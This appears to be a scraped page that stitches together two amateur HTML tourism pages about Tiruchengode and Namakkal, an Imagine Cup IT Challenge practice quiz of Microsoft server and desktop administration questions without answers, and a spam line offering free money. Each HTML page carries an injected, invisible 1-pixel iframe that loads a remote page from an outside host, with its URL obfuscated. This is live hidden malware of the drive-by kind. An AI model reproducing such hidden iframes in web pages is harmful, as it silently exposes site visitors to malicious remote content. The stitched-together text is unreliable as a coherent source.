Tiruchengode.html:

<html>
<head>
<title>THIRUCHENGODE</title>
</head><body bgcolor="yellow">
<p><CENTER><img src="file:///D:/Documents and Settings/STUDENT/Desktop/tGODE.gif" width="593" height="406" border="0">
<p align="center"><strong>WELCOME TO  THIRUCHENGODE</strong></p>
<p>SPOT PLACES IN TIRUCHENCGODE:
<BR>
<UL>
<LI>Arthanareswar temple </LI>
<LI>Thiruchengode Hill</li>
<li>KSR Institutions </li>
<li>Vivekandanda Institutions</li>
</ul>
<a href="main.html">Back to Home Page</a>
<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>

Namakkal.html:
<html>
<head>
<title>NAMAKKAL</title>
<h1 align=center>"Welcome to Namakkal City"</h1>
</head><body  background="n.gif" height=300 width=400>
<p>SOME OF THE TOURIST PLACES IN NAMAKKAL ARE</p>
<p ><a href="rock.gif">1.Rockport</p></a>
<p>2.Anjaneyar Temple</p>
<p>3.LMR theatre</p>
<p>4.SELVAM insitiutions</p>
<a href=main.html>Back to Home Page</a>
<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>
 

Imagine Cup - IT Challenge, Round 1 Resource (2)

Posted:

Imagine Cup - IT Challenge!
IT Challenge Round 1 Practice Questions.
 (attend Quiz after preparing)

The questions below will give you a taste of the questions that will appear on the IT Challenge Quiz.  

Welcome to the Imagine Cup IT Challenge Quiz!

You must answer all questions in the time provided, as indicated by the countdown timer above.

Please answer each question by selecting one of the multiple choice answers below it. You can answer the questions in any order, and can change your answers at any point during the quiz time. However, once the quiz time is up, you will be prevented from making any further changes.

Your score will be the number of questions you get right. No points are deducted for incorrect answers, so it is in your best interest to always make your best guess.

Your answers will automatically be saved every 5 minutes. If you would like to save them at other times, please use the "Save Answers" button above. Use "Finish Quiz" when you have finished the quiz - the quiz window will then close and you'll be unable to make further changes to your answers.

If you inadvertently close your browser window, lose your connection, or encounter any error during the quiz, return to your IT Challenge portal page and click on "COMPETE" again. If you are unable to enter or re-enter the quiz at all, contact 
Support immediately. Include your Imagine Cup user name and any error codes that you received in your e-mail.

IMPORTANT: The IT Challenge Quiz makes use of cookies and javascript. Your browser must accept both. Some browser add-on components, like third party toolbars, may conflict with the operation of the IT Challenge Quiz, and we recommend that you disable them before starting. If you encounter scripting errors while running the IT Challenge Quiz, be sure to restart your browser and clear your cache before continuing.

Good luck!

Also see Resource (1)

PART - A

Question 1 of 30:

I am using Excel 2007 and want to publish to a SharePoint Server 2007 environment with Enterprise Features enabled. From Excel 2007, which of the following are valid options for publication using the Excel Services Options wizard? 
Answer:
A)
A specific sheet
B)
All Tables, A specific sheet or A specific table
C)
A specific table
D)
All Tables


Question 2 of 30:

To deploy an exchange 2010 sp1 in a site the site must be running? 
Answer:
A)
At least a Windows 2008 R2 Read only domain Controller.
B)
Any version of Windows 2000 or 2003 Domain Controller.
C)
A writable Global Catalog Windows 2003 with SP2 installed Domain Controller
D)
Exchange 2003 with SP2 installed.


Question 3 of 30:

In SharePoint Server 2007, which of the following Galleries is NOT available from the Site Settings page on a subsite (such as http://servername/sites/site1) that is created using the Team Site template? 
Answer:
A)
Site Columns
B)
Site Content Types
C)
Web Application Parts
D)
Master Pages


Question 4 of 30:

Which of the below can you use to remove a domain Controller from Active Directory? 
Answer:
A)
DCPROMO
B)
DCUNPROMO
C)
File Manager
D)
Active Directory Domain and Trusts


Question 5 of 30:

Which parameter do you use with dcpromo to forcibly demote a domain controller? 
Answer:
A)
/forceremoval
B)
/force
C)
/demote
D)
You cannot do this with the dcpromo utility


Question 6 of 30:

Which of the following components is not required when deploying the Audit Collection Service? 
Answer:
A)
ACS Collector
B)
ACS forwarders
C)
ACS Aggregator
D)
ACS Database


Question 7 of 30:

You are a messaging professional. Your company runs a Microsoft Exchange Server 2007 messaging system. All Exchange Server 2007 computers run Microsoft Windows Server 2003 Enterprise edition or Standard edition. The Exchange Server 2007 deployment includes 20 Exchange servers installed in ten different locations. All locations are connected to the corporate headquarters by a wide area network (WAN) link. Each office also maintains a direct Internet connection. You deploy a Microsoft Windows Server Update Services (WSUS) computer at the corporate headquarters. You need to ensure all updates approved by administrators on the WSUS computer at the corporate headquarters are installed on all Exchange Server 2007 computers. You also need to ensure that the bandwidth usage is minimized across the WAN links. What should you do? 
Answer:
A)
Configure all Exchange Server 2007 computers in the remote offices to download and install all updates from the Microsoft Update Web site.
B)
Configure all Exchange Server 2007 computers in the remote offices to download and install updates from the WSUS server at the corporate headquarters.
C)
Install a WSUS server in each office. Configure the WSUS server in each office to obtain the approval list and updates from the WSUS server at the corporate headquarters. Configure all Exchange Server 2007 computers in the remote offices to download and install updates from their local WSUS server.
D)
Configure all Exchange Server 2007 computers in the remote offices to download a list of approved updates from the WSUS server at the corporate headquarters. Configure all Exchange Server 2007 computers to download and install approved updates from the Microsoft Update Web site.


Question 8 of 30:

You are a desktop support technician for your company. A user runs a custom application on a computer that runs Microsoft Windows 2000 Professional. You upgrade the computer to Windows Vista. The user is unable to run the custom application on the upgraded computer. You discover that the application does not support more than 256 color settings. You need to ensure that the user can run the application on the upgraded computer. What should you do? 
Answer:
A)
Specify the required compatibility mode in the properties of the application executable file.
B)
Specify the required compatibility mode and display settings in the properties of the application.
C)
Specify the required display settings in the properties of the application and run the application as administrator.
D)
Run Application Compatibility Toolkit 5.0 to modify the application to run in the Windows Vista environment.


Question 9 of 30:

What best describes RemoteFX? 
Answer:
A)
An advanced file sharing utility
B)
A remote system diagnostic tool
C)
A SCCM 2007 R3 remote tools option
D)
GPU virtualization


Question 10 of 30:

You are the network administrator for your company. You have created a customized installation of Windows Vista that you wish to capture to an image and deploy automatically. Which tool is used to capture a Windows Vista image? 
Answer:
A)
Business Desktop Deployment Toolkit
B)
WinImage
C)
VistaImage
D)
ImageX


Question 11 of 30:

I installed Windows 7 Ultimate on a Vista laptop using the upgrade option on the installation media, what are my options for uninstalling Windows 7 and reverting back to Vista? 
Answer:
A)
There is no operating system to which you can revert. You need to back up your data, and reinstall Vista and then restore your data.
B)
The Windows 7 installation created a Windows.old folder that contains the previous operating system and personal files. KB article 971760 gives details on the restore process.
C)
Access the Control Panel, and select Backup and Restore, click on Recover system settings or your computer, click on Advanced recovery methods, and select Use a system image you created earlier to recover your computer.
D)
Boot with the Recovery option and select Revert to Previous Operating System


Question 12 of 30:

Window Software Update Services (WSUS) is a patch management solution for Windows networks that supplies service packs, security patches, and more to Windows clients and servers. What version of Windows Software Update Services (WSUS) is required to provide updates to Windows Vista clients and Windows 2008 servers? 
Answer:
A)
Version 1.0
B)
Version 2.0
C)
Version 3.0
D)
Version 4.0


Question 13 of 30:

In Active Directory 2003 functional mode, how many Global Catalogs are required per forest? 
Answer:
A)
2 per domain
B)
1 per domain
C)
1 per forest
D)
2 per forest


Question 14 of 30:

What is the purpose of the file share witness? 
Answer:
A)
To add redundancy to a Distributed File System replication group
B)
To maintain quorum of an Exchange 2007 cluster
C)
To maintain quorum of a Windows cluster
D)
To govern replication of a SQL transaction logs


Question 15 of 30:

I have a 'C' drive and an 'E' drive on my computer. The 'C' drive is for the operating system and applications and files, while the 'E' drive is for storing software .iso images. I don't want Windows 7 to index the contents of the 'E' drive. So I click on the Computer icon from the Start menu, right click on the 'E' drive, and choose Properties. Now which tab do I access to turn off indexing for this drive? 
Answer:
A)
Tools
B)
General
C)
Hardware
D)
Sharing


Question 16 of 30:

You are the administrator for the company network. You are bringing a new remote office online. The office has a domain controller that also runs DNS and WINS. It also has a file server that runs DHCP. DHCP enabled workstations are not getting DHCP addresses as expected. What should you do? 
Answer:
A)
Enable DHCP forwarding on the workstations
B)
Move the DHCP service to the domain controller
C)
Disable WINS since it interferes with DHCP on the same network
D)
Authorize the DHCP server in Active Directory


Question 17 of 30:

Your company's workstation computer accounts are in two organizational units named Sales and Technology. All user accounts are located in an organizational unit named Accounts. You create and configure a GPO named Desktop Restrictions. You need to apply the new GPO to only the employees in the Sales organizational unit. You modify the user configuration settings in the GPO. What should you do next? 
Answer:
A)
Link the GPO to the domain.
B)
Link the GPO to the Accounts organizational unit.
C)
Enable Loopback Processing for the GPO and link the GPO to the Sales organizational unit.
D)
Enable Loopback Processing for the GPO and link the GPO to the Technology organizational unit.


Question 18 of 30:

What is the technology used to push email to Windows Mobile 6 devices in near real-time? 
Answer:
A)
DirectPush
B)
ActiveSync
C)
Outlook Mobile Access
D)
MobileSync for Outlook


Question 19 of 30:

Which of the following is not a phase of Scandisk: 
Answer:
A)
Verifying indexes
B)
Verifying resource fork
C)
Verifying file data
D)
Verifying security descriptors


Question 20 of 30:

You are the administrator for the company network that is running a Windows 2003 domain. You want to ensure that all workstations in the domain keep the same time. What should you do? 
Answer:
A)
Create a user logon script to run 'NET TIME /DOMAIN:domainname'
B)
Create a computer startup script to run 'NET TIME /DOMAIN:domainname'
C)
Do nothing
D)
Configure Group Policy


Question 21 of 30:

You have a System Center Configuration Manager 2007 environment. The Wake On LAN setting is enabled for the site. You create a software package for a critical application. You need to deploy the package to all client computers within the next 12 hours. The current time is 6:00 P.M. What should you do? 
Answer:
A)
Configure an advertisement to become available at the current time. Select the Enable Wake On LAN setting for the advertisement.
B)
Configure an advertisement with an advertisement start time of 6:00 P.M. and an expiration of 6:00 A.M. Select the Enable Wake On LAN setting for the advertisement.
C)
Configure an advertisement with an assignment schedule of As soon as possible. Select the Enable Wake On LAN setting for the advertisement.
D)
Configure an advertisement with an advertisement start time of 6:00 P.M. and an expiration of 6:00 A.M. Select the Allow system restart outside maintenance windows setting.


Question 22 of 30:

In exchange 2010 SP1 the Client Access Server can proxy requests from the internet for? 
Answer:
A)
Exchange 2003 Backend Server in the same site.
B)
Exchange 2007 Client Access Servers in another non internet facing site.
C)
Exchange 2007 Client Access Servers in the same site.
D)
Exchange 2003 Frontend Servers in another non internet facing site.


Question 23 of 30:

What of the following is a valid option in WSS 3.0 when I have Full Control permissions and I want to create a new library on my site? 
Answer:
A)
Report Library
B)
Data Connection Library
C)
Project Tasks
D)
Wiki Page Library


Question 24 of 30:

Given a server with a RAID array with 2.5 TB of usable data, which of the following disk partitioning schemes is valid: 
Answer:
A)
Configure a single logical drive to be used with a 50GB partition for the C drive and a 2.45TB partition for a D drive
B)
Configure two logical drives: one 50GB in size with a single partition for a C drive and a second 2.45TB in size with a single partition for a D drive.
C)
Configure a single logical drive to be used as a single partition for the C drive.
D)
Configure two logical drives: one 2.45TB in size with a single partition for a C drive and a second 50GB in size with a single partition for a D drive.


Question 25 of 30:

You have a Windows Mobile 6.0 device. You are running low on memory and determine that the Outlook email attachments are being downloaded automatically. You want to disable automatic attachment downloads. Where should you do that? 
Answer:
A)
In Settings, Connections
B)
In Outlook E-mail Menu, Tools, Options
C)
In Settings, Memory
D)
In ActiveSync Menu, Options


Question 26 of 30:

You are a desktop support technician for your company. The computers in your company run Windows Vista and are in a domain environment. You plan to replace the current security policy for the computers. You need to ensure that you can configure the new security policy and apply it to all the computers. You also need to ensure that you can use Resultant Set of Policy (RSoP) to remotely check the outcome of the new security policy. Which action should you perform? 
Answer:
A)
Disable WMI Filters from group policy.
B)
Click the Replace option in Loopback Processing.
C)
Run the new group policy object in logging mode.
D)
Select slow connection simulation on the new security policy.


Question 27 of 30:

Exchange 2010 SP1 the DAC mode is implemented for? 
Answer:
A)
To get availability
B)
To get high tolerance
C)
To avoid split brain
D)
To get exchange automatic backup


Question 28 of 30:

You need to prevent e-mail messages that contain the word spam in the subject line from being delivered to any user mailboxes. What should you do? 
Answer:
A)
Add spam to the subject line filter. Enable the filter for a Manual Scan Job, and then select the Quarantine notification.
B)
Add *spam* to the subject line filter. Enable the filter for a Realtime Scan Job, and then set the filter action to Purge: eliminate message.
C)
Add spam to the keyword filter. Enable the filter for a Transport Scan Job, and then set the filter action to Purge: eliminate message.
D)
Add *spam* to the keyword filter. Enable the filter for a Transport Scan Job, and then set the filter action to Identify: tag message.


Question 29 of 30:

You are the messaging administrator for your company. Your SMTP Gateway servers run under the Edge Transport Role on Exchange 2007. All internal messaging servers run Exchange 2007 and the workstations run Outlook 2007. The system is currently configured to block non-domain recipients and that is working fine. You are tasked with replicating a copy of each user's Safe and Blocked Sender's Lists to the Edge Transport Servers. Which item(s) need to be configured to accomplish the task? 
Answer:
A)
Safelist Aggregation
B)
Group Policy
C)
EdgeSync
D)
EdgeSync and Safelist Aggregation


Question 30 of 30:

How is the Remote Desktop Web Access role service configured after it is installed? 
Answer:
A)
Remote Desktop Web Access Administrators group, Remote Desktop Web Access Administration tool, or Remote Desktop server name in the configuration web page
B)
Remote Desktop Web Access Administration tool
C)
Remote Desktop server name in the configuration web page
D)
Remote Desktop Web Access Administrators group



PART - B



Question 1: 
When configuring a SQL 2005 Server in preparation for connectivity to a SharePoint Server 2007 farm, Microsoft recommends that Local and Remote Connections use both TCP/IP and named pipes. Where is this setting found? 

A. In the SQL Server Management Studio 
B. In the SQL Server Configuration Manager 
C. In the SQL Server 2005 Surface Area Configuration tool 
D. In the SQL Server Business Intelligence Development Studio 



Question 2: 
To which group should you add a user to allow them to authorize DHCP servers? 

A. Domain Admins 
B. Schema Admins 
C. Local Admins 
D. Enterprise Admins 



Question 3: 
Active Directory topology is calculated based on what?

A. Site link cost 
B. Bandwidth 
C. Latency 
D. Distance 



Question 4: 
Which component allows an administrator to enforce organizational standards to newly created GPOs?

A. ADMX/ADML templates 
B. Starter GPOs 
C. WMI filtering 
D. GPO precedence rules 



Question 5: 
What tool can be used to take remote control of another user's RDP session?

A. Remote Desktop Server Manager 
B. RDP Client 
C. Remote Desktop Session Broker 
D. Powershell 



Question 6: 
What are the requirements for Hyper-V R2? 

A. 32 bit Operating system 
B. A CPU with Hardware Assisted Virtualization 
C. 16 GB of RAM 
D. A CPU with Hardware Assisted Virtualization, 32 bit Operating system, and 16 GB of RAM 



Question 7: 
Which command-line editor should be used in Windows 7 to modify settings such as the boot sequence, display order and time out values for multiple operating systems, or Emergency Management Services and boot debugging settings?

A. Bcdedit.exe 
B. Winconfig.exe 
C. Bootiniconfig.exe 
D. Regedit.exe 



Question 8: 
What setting, if enabled, will immediately push the SCCM client out to any discovered machines?

A. Enabling Computer Client Agent 
B. Enabling Client Push Installation to assigned Resources 
C. Enabling the Software Update Point client Installation 
D. Enabling Advertised Programs Agent 



Question 9: 
Why are the ASP.NET Ajax extensions 1.0 needed for a successful Operations Manager 2007 R2 installation?

A. To enable Operations Manager 2007 R2 to monitor Unix and Linux systems 
B. To enable the use of the WebConsole Reporting module 
C. To enable the use of the WebConsole Authoring module 
D. To enable the use of the WebConsole Health explorer 



Question 10: 
How many database replicas are supported in Exchange Server 2010 Database Availability Groups? 

A. Only 1 per Storage Group 
B. Up to 5 
C. Unlimited 
D. Up to 16 



Question 11: 
Which server in a SCOM architecture holds the Data Warehouse? 

A. Operations database server 
B. Standby operations database server
C. Reporting server 
D. Root management server 



Question 12: 
Which utility uses SQL queries to review and analyze IIS logs for failures and unusual behavior? 

A. Tracelog 3.1 
B. Logparser 2.2 
C. EventcombMT 
D. nlparse 



Question 13: 
You are the administrator for the company network. You are bringing a new remote office online. The office has a domain controller that also runs DNS and WINS. It also has a file server that runs DHCP. DHCP enabled workstations are not getting DHCP addresses as expected. What should you do? 

A. Move the DHCP service to the domain controller 
B. Disable WINS since it interferes with DHCP on the same network 
C. Authorize the DHCP server in Active Directory 
D. Enable DHCP forwarding on the workstations 



Question 14: 
You are a database administrator for your company. You review the error log for a SQL Server 2005 Enterprise Edition computer. You notice torn page errors for one index in a 2-terabyte (TB) database. You need to resolve the torn index page problem as quickly as possible. What should you do? 

A. Run DBCC CHECKDB with the REPAIR_REBUILD option. 
B. Use the latest database tape backup to restore only the torn page. Then restore any transaction logs that have been made since the full backup. 
C. Restore the latest full tape database backup. Then restore any transaction logs that have been made since the full backup. 
D. Restore the database from the most recent database snapshot. 



Question 15: 
You are the support engineer for your company. A user is complaining about connectivity problems with the Outlook 2007. Their mailbox is hosted on an Exchange 2007 server. You want to check their Outlook connection status. What should you do? 

A. Right-click on the Outlook icon in the system tray. 
B. Select Help, Office Diagnostics. 
C. Ctrl-right-click on the Outlook icon in the system tray. 
D. Select Tools, Rules and Alerts 



Question 16: 
In WSS 3.0 when a site administrator wishes to create a new subweb using the Team Site template, which of the following links does she select from the Create page?

A. Basic Page 
B. Web Part Page 
C. Sites and Workspaces 
D. Collaboration Portal 



Question 17: 
In Exchange Server 2010 Database Availability Groups, the quorum model is handled as follows: 

A. Only Node Majority is supported, therefore DAGs must be configured only in odd number of member servers. 
B. Only Fileshare Majority is supported, therefore DAGs must be configured only in even number of member servers. 
C. The quorum model automatically changes between Node Majority, and Node and File Share Majority dependent on the number of member servers in the DAG. 
D. Quorum is handled only by clustered shared volumes (CSVs) and therefore can only be created in odd number of member servers in the DAG. 



Question 18: 
You are a consumer support technician. A user's computer has a 100-GB hard disk and contains 80% free space. The hard disk contains a collection of pictures, videos, and music files that uses 3.5 GB of space. The user plans to send a backup copy of the file collection to a friend who resides in another state. You need to provide the user the most efficient backup method for sending the media files. You also need to minimize the size of the backup media set. What should you do? 

A. Use the Back up files option to back up the media files to a set of CDs. 
B. Use the Back up computer option to back up the computer to a set of DVDs. 
C. Use the Back up computer option to back up the computer to an external hard disk. 
D. Use the Back up files option to back up the media files to a DVD. 



Question 19: 
You are the network administrator for your company. All servers run Windows 2003. You need to access your servers in the DMZ using SSL. What port would you ask the firewall administrator to open to give you access? 

A. 443 
B. 21 
C. 3389 
D. 1443 



Question 20: 
I click on the Start button and enter System in the Search field, select System Configuration and hit enter to open the tool. Which of the following options on the Boot tab allow me to boot the system without the statup splash screen showing? 

A. Boot log 
B. No GUI boot 
C. Base video 
D. OS boot information 



Question 21: 
You need to select the architecture for Exchange 2007 that will give you automatic redundancy in the case of a server or storage failure. Which option is best: 

A. Implement Clustered Continuous Replication on the Exchange 2007 mailbox server. 
B. Implement Exchange 2007 in a virtual server and copy the virtual server to another host each night. 
C. Implement Continuous Local Backup on the Exchange 2007 mailbox server. 
D. Implement a Single Copy Cluster on the Exchange 2007 mailbox server. 



Question 22: 
You are the administrator for the company network. The amount of data stored on Windows file servers has been growing steadily. You company does not and cannot implement storage quotas at this time. Analysis of the files on the file servers shows that users are storing MP3 files, which violates company storage policies. How can you prevent users from storing MP3 files on the company file servers? 

A. Implement an Encrypted File System policy 
B. Configure it in Group Policy 
C. Upgrade the file servers to Windows file servers to Windows Server 2003 R2 and utilize File Server Resource Manager 
D. Block MP3 files using the Windows Firewall 



Question 23: 
Which of the following is a valid PowerShell command in Windows 7 (assuming the directories and files referenced do in fact exist on the computer)? 

A. compare-object -referenceobject $(get-content C:\test\test.txt) -differenceobject $(get-content C:\testtwo\test.txt) 
B. compare-object -referenceobject $(get-content C:\test one\test.txt) -differenceobject $(get-content C:\testtwo\test.txt) 
C. compare-object -referenceobject (get-content C:\test\test.txt) -differenceobject (get-content C:\testtwo\test.txt) 
D. compare-object -referenceobject {get-content C:\test one\test.txt} -differenceobject {get-content C:\testtwo\test.txt} 



Question 24: 
You have a System Center Configuration Manager 2007 environment. You need to ensure that remote client computers that connect to the virtual private network (VPN) are able to receive software updates. What should you do? 

A. Create a new site system, and configure it with the SMS Provider role. 
B. Add the IP subnets that the VPN uses to the network discovery. 
C. Create a new site boundary, and add the IP subnets that the VPN uses to the site boundary. 
D. Create a new site system, and configure it with the Software Update Point role. 



Question 25: 
You are the backup administrator for your company. The company uses Data Protection Manager 2007 to backup all its servers. For security, you want to encrypt the data that is backed up by DPM. What should you do? 

A. Select encryption in the short-term protection options in the protection group. 
B. Select encryption in the long-term protection options in the protection group. 
C. Select encryption in both short-term and long-term protection options in the protection group. 
D. Select encryption in the agent options. 



Question 26: 
You are the mail administrator for your company. The company uses Exchange 2003 and Outlook 2003. A user complains that her calendar keeps reminding her about a past appointment even though she has dismissed it. How can you correct this problem? 

A. Delete the user's Free/Busy information 
B. Run Outlook with the /ClearReminders switch 
C. Reboot the Exchange mailbox server 
D. Run Outlook with the /CleanReminders switch 



Question 27: 
Which one or more of the following file types will be indexed by SharePoint Server 2007 when uploaded to a document library in an out-of-the-box configuration? 

A. .ppt 
B. .doc and .ppt 
C. .pdf 
D. .doc 



Question 28: 
If I am a farm administrator and am accessing the Central Administrator console for SharePoint Server 2007, what tab(s) appear by default from the home page? 

A. Application Management, Home and Operations 
B. Home 
C. Operations 
D. Application Management 



Question 29: 
You are a messaging professional. Your company uses a Microsoft Exchange Server 2007 messaging system. The company adds a new Mailbox server and moves half of the user mailboxes to the new server. You set the retention period for deleted mailboxes to 21 days. The backup report shows that the Exchange Server 2007 backups store 800 GB of data. The mailboxes of the users contain 200 GB of data. There are no public folder databases. All Exchange Server 2007 databases are stored on a Storage Area Network (SAN), which has available disk space. You need to reduce the time taken to back up the Exchange Server 2007 databases. You must achieve this goal by minimizing the disruption of user access to mailboxes. Which action should you perform? 

A. Set the retention period for deleted mailboxes to five days. 
B. Increase the window for scheduled online maintenance for each mailbox database. 
C. Create a new database on the same Mailbox server for each existing database. Move users to the new databases and delete the old databases. 
D. Dismount and defragment each mailbox database. 



Question 30: 
You are a Windows Mobile 6.0 device user. You are concerned that your email might not be synchronizing to your Exchange server. You want to check the status. Where should you check status? 

A. Start, Settings, Device Information 
B. Start, Programs, ActiveSync 
C. Start, Settings, Error Reporting 
D. Messaging, Menu, Options 




Also see Resource (1)

Get Free MasterCard With $25

Popular Posts